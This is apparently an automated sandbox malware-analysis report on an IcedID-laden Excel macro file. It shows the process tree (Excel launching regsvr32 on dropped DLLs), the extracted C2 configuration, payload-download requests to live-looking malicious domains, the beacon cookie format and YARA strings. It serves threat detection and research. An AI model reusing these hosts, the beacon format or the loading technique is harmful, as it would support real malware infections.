Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report HRScheduleH3965005.xlsm

Overview

General Information

Sample Name:HRScheduleH3965005.xlsm
Analysis ID:444771
MD5:1799e36c7dcdafacaf883a1f9d92f62f
SHA1:d49cb116574bedd7a18eb99b3f74f9b10964f3f8
SHA256:1756dea333ae5179a904c49f5fb16b76b03208cce0c05953552a46fd37e685f7
Tags:IcedIDxlsm
Infos:

Most interesting Screenshot:

Detection

IcedID
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Found malware configuration
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
System process connects to network (likely due to code injection or exploit)
Yara detected IcedID
C2 URLs / IPs found in malware configuration
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Tries to detect virtualization through RDTSC time measurements
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to query network adapater information
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Excel documents contains an embedded macro which executes code when the document is opened
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
PE file contains an invalid checksum
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Registers a DLL
Uses a known web browser user agent for HTTP communication
Uses insecure TLS / SSL version for HTTPS connection
Yara signature match

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2556 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • regsvr32.exe (PID: 532 cmdline: regsvr32 -silent ..\XRAY.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2904 cmdline: regsvr32 -silent ..\XTOWN.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2420 cmdline: regsvr32 -silent ..\XZIBIT.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
  • cleanup

Malware Configuration

Threatname: IcedID

{"Campaign ID": 3565085024, "C2 url": "astrocycle.download"}

Yara Overview

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_IcedID_1Yara detected IcedIDJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpJoeSecurity_IcedID_1Yara detected IcedIDJoe Security
      00000004.00000002.2096122245.00000000000A0000.00000004.00000001.sdmpMAL_IcedID_GZIP_LDR_2021042021 initial Bokbot / Icedid loader for fake GZIP payloadsThomas Barabosch, Telekom Security
      • 0x27c6:$internal_name: loader_dll_64.dll
      • 0x30b4:$string0: _gat=
      • 0x3114:$string1: _ga=
      • 0x30ec:$string2: _gid=
      • 0x30cc:$string3: _u=
      • 0x3026:$string4: _io=
      • 0x30d8:$string5: GetAdaptersInfo
      • 0x2b16:$string6: WINHTTP.dll
      • 0x27ea:$string7: DllRegisterServer
      • 0x27fc:$string8: PluginInit
      • 0x3080:$string9: POST
      • 0x3140:$string10: aws.amazon.com
      00000004.00000002.2096415724.000000000032D000.00000004.00000020.sdmpJoeSecurity_IcedID_1Yara detected IcedIDJoe Security
        Process Memory Space: regsvr32.exe PID: 2904JoeSecurity_IcedID_1Yara detected IcedIDJoe Security

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          4.2.regsvr32.exe.2000000.4.unpackMAL_IcedID_GZIP_LDR_2021042021 initial Bokbot / Icedid loader for fake GZIP payloadsThomas Barabosch, Telekom Security
          • 0x27c6:$internal_name: loader_dll_64.dll
          • 0x30bc:$string0: _gat=
          • 0x311c:$string1: _ga=
          • 0x30f4:$string2: _gid=
          • 0x30d4:$string3: _u=
          • 0x302e:$string4: _io=
          • 0x30e0:$string5: GetAdaptersInfo
          • 0x2b16:$string6: WINHTTP.dll
          • 0x27ea:$string7: DllRegisterServer
          • 0x27fc:$string8: PluginInit
          • 0x3088:$string9: POST
          • 0x3148:$string10: aws.amazon.com
          4.2.regsvr32.exe.a0000.0.raw.unpackMAL_IcedID_GZIP_LDR_2021042021 initial Bokbot / Icedid loader for fake GZIP payloadsThomas Barabosch, Telekom Security
          • 0x27c6:$internal_name: loader_dll_64.dll
          • 0x30b4:$string0: _gat=
          • 0x3114:$string1: _ga=
          • 0x30ec:$string2: _gid=
          • 0x30cc:$string3: _u=
          • 0x3026:$string4: _io=
          • 0x30d8:$string5: GetAdaptersInfo
          • 0x2b16:$string6: WINHTTP.dll
          • 0x27ea:$string7: DllRegisterServer
          • 0x27fc:$string8: PluginInit
          • 0x3080:$string9: POST
          • 0x3140:$string10: aws.amazon.com
          4.2.regsvr32.exe.a0000.0.unpackMAL_IcedID_GZIP_LDR_2021042021 initial Bokbot / Icedid loader for fake GZIP payloadsThomas Barabosch, Telekom Security
          • 0x1bc6:$internal_name: loader_dll_64.dll
          • 0x1f16:$string6: WINHTTP.dll
          • 0x1bea:$string7: DllRegisterServer
          • 0x1bfc:$string8: PluginInit

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
          Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: regsvr32 -silent ..\XRAY.dll, CommandLine: regsvr32 -silent ..\XRAY.dll, CommandLine|base64offset|contains: ,, Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2556, ProcessCommandLine: regsvr32 -silent ..\XRAY.dll, ProcessId: 532

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 4.2.regsvr32.exe.2000000.4.unpackMalware Configuration Extractor: IcedID {"Campaign ID": 3565085024, "C2 url": "astrocycle.download"}
          Yara detected IcedIDShow sources
          Source: Yara matchFile source: dump.pcap, type: PCAP
          Source: Yara matchFile source: 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2096415724.000000000032D000.00000004.00000020.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 2904, type: MEMORY
          Source: unknownHTTPS traffic detected: 13.224.92.73:443 -> 192.168.2.22:49170 version: TLS 1.0
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior

          Software Vulnerabilities:

          barindex
          Document exploit detected (creates forbidden files)Show sources
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\XTOWN.dllJump to behavior
          Document exploit detected (drops PE files)Show sources
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: lsdfik[1].fml.0.drJump to dropped file
          Document exploit detected (UrlDownloadToFile)Show sources
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileAJump to behavior
          Document exploit detected (process start blacklist hit)Show sources
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe
          Source: global trafficDNS query: name: thousandsyears.download
          Source: global trafficTCP traffic: 192.168.2.22:49170 -> 13.224.92.73:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.198.51:80

          Networking:

          barindex
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: astrocycle.download
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 06 Jul 2021 15:02:22 GMTContent-Type: application/octet-streamContent-Length: 57856Connection: keep-aliveContent-Disposition: attachment; filename=lsdfik.fmlCache-Control: max-age=14400CF-Cache-Status: HITAge: 3950Accept-Ranges: bytesReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=2tFpU8aAbVHKc8qaWG5vA44M%2FvQQDR%2FHMrJKYE2U8pvpTAJBVZB1EwE1r%2BdCJ9kIPXR9eZUJcp4sTKGEmTFWIbmcSnYHw3hmyr%2B4FkYtjbFf%2B2GBpgB79iIn9w%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 66a9b6b50e8b2c22-FRAalt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 09 8f f1 c7 4d ee 9f 94 4d ee 9f 94 4d ee 9f 94 3e 8c 9e 95 4e ee 9f 94 4d ee 9e 94 4b ee 9f 94 4d ee 9f 94 49 ee 9f 94 e8 87 9f 95 4c ee 9f 94 e8 87 9d 95 4c ee 9f 94 52 69 63 68 4d ee 9f 94 00 00 00 00 00 00 00 00 50 45 00 00 64 86 04 00 86 06 e4 60 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 00 00 00 3a 00 00 00 a4 00 00 00 00 00 00 20 13 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 01 00 00 04 00 00 f8 ba 01 00 01 00 60 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 a0 ec 00 00 fc 00 00 00 9c ed 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 cc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 28 38 00 00 00 10 00 00 00 3a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 7e 9e 00 00 00 50 00 00 00 a0 00 00 00 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 60 00 00 00 00 f0 00 00 00 02 00 00 00 de 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 cc 00 00 00 00 00 01 00 00 02 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$MMM>NMKMILLRichMPEd`" : `(P
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=3565085024:1:7007:51; _gat=6.1.7601.64; _ga=1.329303.0.5; _u=343732383437:416C627573:32323430323331394544383343383535; __io=0; _gid=67AFEDC5AC03Host: astrocycle.download
          Source: Joe Sandbox ViewIP Address: 172.67.198.51 172.67.198.51
          Source: Joe Sandbox ViewIP Address: 172.67.213.115 172.67.213.115
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
          Source: global trafficHTTP traffic detected: GET /div/44376,8555986111.jpg HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: thousandsyears.downloadConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /div/44376,8555986111.jpg HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: voopeople.funConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /div/44376,8555986111.jpg HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: uppercilio.funConnection: Keep-Alive
          Source: unknownHTTPS traffic detected: 13.224.92.73:443 -> 192.168.2.22:49170 version: TLS 1.0
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D2027E4.pngJump to behavior
          Source: global trafficHTTP traffic detected: GET /div/44376,8555986111.jpg HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: thousandsyears.downloadConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /div/44376,8555986111.jpg HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: voopeople.funConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /div/44376,8555986111.jpg HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: uppercilio.funConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=3565085024:1:7007:51; _gat=6.1.7601.64; _ga=1.329303.0.5; _u=343732383437:416C627573:32323430323331394544383343383535; __io=0; _gid=67AFEDC5AC03Host: astrocycle.download
          Source: regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpString found in binary or memory: <a class="lb-txt-none lb-txt-p-chromium lb-none-pad lb-none-v-margin lb-txt" style="padding-right:5px;" href="https://www.facebook.com/amazonwebservices" target="_blank" rel="noopener" title="Facebook"> <i class="icon-facebook"></i></a> equals www.facebook.com (Facebook)
          Source: regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpString found in binary or memory: <a class="lb-txt-none lb-txt-p-chromium lb-none-pad lb-txt" style="padding-right:5px;" href="https://www.youtube.com/user/AmazonWebServices/Cloud/" target="_blank" rel="noopener" title="YouTube"> <i class="icon-youtube"></i></a> equals www.youtube.com (Youtube)
          Source: regsvr32.exe, 00000004.00000002.2099979951.0000000003090000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
          Source: regsvr32.exe, 00000004.00000002.2096415724.000000000032D000.00000004.00000020.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
          Source: unknownDNS traffic detected: queries for: thousandsyears.download
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 06 Jul 2021 15:02:25 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=d3szPdyTRg6bzD7Bq5SxAVq2%2FmuLykBb6CLjyhuLYziN788WdmOD6V%2BCF4ofbolE28MKKdSEx2vLiJFErQQl8xkCs1l6sttDcKgOkPu97qCFks8YeLBPfnXv54E%2BO4UxsQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 66a9b6c84ca94a61-FRAalt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400Data Raw: 31 31 31 0d 0a 09 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 09 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 09 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 09 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 09 3c 68 72 3e 0a 09 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 73 74 72 6f 63 79 63 6c 65 2e 64 6f 77 6e 6c 6f 61 64 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 09 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 111<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at astrocycle.download Port 80</address></body></html>
          Source: regsvr32.exe, 00000004.00000002.2096415724.000000000032D000.00000004.00000020.sdmpString found in binary or memory: http://astrocycle.download/
          Source: regsvr32.exe, 00000004.00000002.2096415724.000000000032D000.00000004.00000020.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
          Source: regsvr32.exe, 00000004.00000002.2096415724.000000000032D000.00000004.00000020.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
          Source: regsvr32.exe, 00000004.00000002.2096415724.000000000032D000.00000004.00000020.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
          Source: regsvr32.exe, 00000004.00000002.2096415724.000000000032D000.00000004.00000020.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: regsvr32.exe, 00000004.00000002.2096415724.000000000032D000.00000004.00000020.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
          Source: regsvr32.exe, 00000004.00000002.2096415724.000000000032D000.00000004.00000020.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
          Source: regsvr32.exe, 00000004.00000002.2096415724.000000000032D000.00000004.00000020.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
          Source: regsvr32.exe, 00000004.00000002.2096415724.000000000032D000.00000004.00000020.sdmpString found in binary or memory: http://crl.rootg2.amazo
          Source: regsvr32.exe, 00000004.00000002.2096415724.000000000032D000.00000004.00000020.sdmpString found in binary or memory: http://crl.rootg2.amazontrust.com/rootg2.crl0
          Source: regsvr32.exe, 00000004.00000002.2096415724.000000000032D000.00000004.00000020.sdmpString found in binary or memory: http://crl.sca1b.amazontrust.com/sca1b.crl0
          Source: regsvr32.exe, 00000004.00000002.2096415724.000000000032D000.00000004.00000020.sdmpString found in binary or memory: http://crl.sca1b.amazontrust.com/sca1b.crl0g0-
          Source: regsvr32.exe, 00000004.00000002.2096415724.000000000032D000.00000004.00000020.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
          Source: regsvr32.exe, 00000004.00000002.2096415724.000000000032D000.00000004.00000020.sdmpString found in binary or memory: http://crt.rootg2.amazontrust.com/rootg2.cer0=
          Source: regsvr32.exe, 00000004.00000002.2096415724.000000000032D000.00000004.00000020.sdmpString found in binary or memory: http://crt.sca1b.a
          Source: regsvr32.exe, 00000004.00000002.2096415724.000000000032D000.00000004.00000020.sdmpString found in binary or memory: http://crt.sca1b.amazontrust.com/sca1b.crt0
          Source: regsvr32.exe, 00000004.00000002.2099979951.0000000003090000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
          Source: regsvr32.exe, 00000004.00000002.2099979951.0000000003090000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
          Source: regsvr32.exe, 00000004.00000002.2100434449.0000000003277000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
          Source: regsvr32.exe, 00000004.00000002.2100434449.0000000003277000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
          Source: regsvr32.exe, 00000004.00000002.2096415724.000000000032D000.00000004.00000020.sdmpString found in binary or memory: http://o.ss2.us/0
          Source: regsvr32.exe, 00000004.00000002.2096415724.000000000032D000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0
          Source: regsvr32.exe, 00000004.00000002.2096415724.000000000032D000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
          Source: regsvr32.exe, 00000004.00000002.2096415724.000000000032D000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
          Source: regsvr32.exe, 00000004.00000002.2096415724.000000000032D000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
          Source: regsvr32.exe, 00000004.00000002.2096415724.000000000032D000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com05
          Source: regsvr32.exe, 00000004.00000002.2096415724.000000000032D000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.entrust.net03
          Source: regsvr32.exe, 00000004.00000002.2096415724.000000000032D000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.entrust.net0D
          Source: regsvr32.exe, 00000004.00000002.2096415724.000000000032D000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
          Source: regsvr32.exe, 00000004.00000002.2096415724.000000000032D000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.rootg2.amazontrust.com08
          Source: regsvr32.exe, 00000004.00000002.2096415724.000000000032D000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.sca1b.amazontrust.com06
          Source: regsvr32.exe, 00000004.00000002.2096415724.000000000032D000.00000004.00000020.sdmpString found in binary or memory: http://s.ss2.us/r.crl0
          Source: regsvr32.exe, 00000004.00000002.2098394364.0000000002CA0000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
          Source: regsvr32.exe, 00000003.00000002.2089228423.0000000001D50000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2096589121.0000000001D00000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2097089458.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
          Source: regsvr32.exe, 00000004.00000002.2100434449.0000000003277000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
          Source: regsvr32.exe, 00000004.00000002.2100434449.0000000003277000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
          Source: regsvr32.exe, 00000004.00000002.2098394364.0000000002CA0000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: regsvr32.exe, 00000004.00000002.2096415724.000000000032D000.00000004.00000020.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
          Source: regsvr32.exe, 00000004.00000002.2096415724.000000000032D000.00000004.00000020.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
          Source: regsvr32.exe, 00000004.00000002.2099979951.0000000003090000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
          Source: regsvr32.exe, 00000004.00000002.2100434449.0000000003277000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
          Source: regsvr32.exe, 00000004.00000002.2099979951.0000000003090000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
          Source: regsvr32.exe, 00000004.00000002.2099979951.0000000003090000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
          Source: regsvr32.exe, 00000004.00000002.2096415724.000000000032D000.00000004.00000020.sdmpString found in binary or memory: http://x.ss2.us/x.cer0&
          Source: regsvr32.exe, 00000004.00000003.2092889123.00000000027C3000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com
          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/aws-blog/1.0.47/js
          Source: regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/da/js/1.0.47/aws-da.js
          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/g11n-lib/2.0.76
          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra-css/css/1.0.382
          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra-css/css/1.0.382/style-awsm.css
          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra-css/images
          Source: regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra-css/images/gi-map/AWS_Global-Infrastructure-Map.svg
          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra-css/images/logos/aws_logo_smile_1200x630.png
          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra-css/images/logos/aws_logo_smile_179x109.png
          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra-css/images/site/fav/favicon.ico
          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra-css/images/site/touch-icon-ipad-144-smile.png
          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra-css/images/site/touch-icon-iphone-114-smile.png
          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra-search/1.0.13/js
          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra/1.0.385/directories
          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra/1.0.385/libra-cardsui
          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra/1.0.385/libra-head.js
          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra/1.0.385/librastandardlib
          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/plc/js/1.0.112/plc
          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/pricing-calculator/js/1.0.2
          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/pricing-savings-plan/js/1.0.6
